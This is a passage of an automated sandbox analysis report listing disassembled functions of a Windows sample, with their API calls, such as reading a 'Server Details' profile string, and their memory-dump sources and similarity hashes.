                    • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                    • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                    • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                    Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString
                    • String ID: A4@$Server Details
                    • API String ID: 1096422788-4071850762
                    • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                    • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                    • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                    • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                    Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID:
                    • API String ID: 438689982-0
                    • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                    • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                    • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                    • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                    Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLocalmemcpymemsetstrlen
                    • String ID:
                    • API String ID: 3110682361-0
                    • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                    • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                    • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                    • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                    Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID:
                    • API String ID: 3510742995-0
                    • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                    • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                    • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                    • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8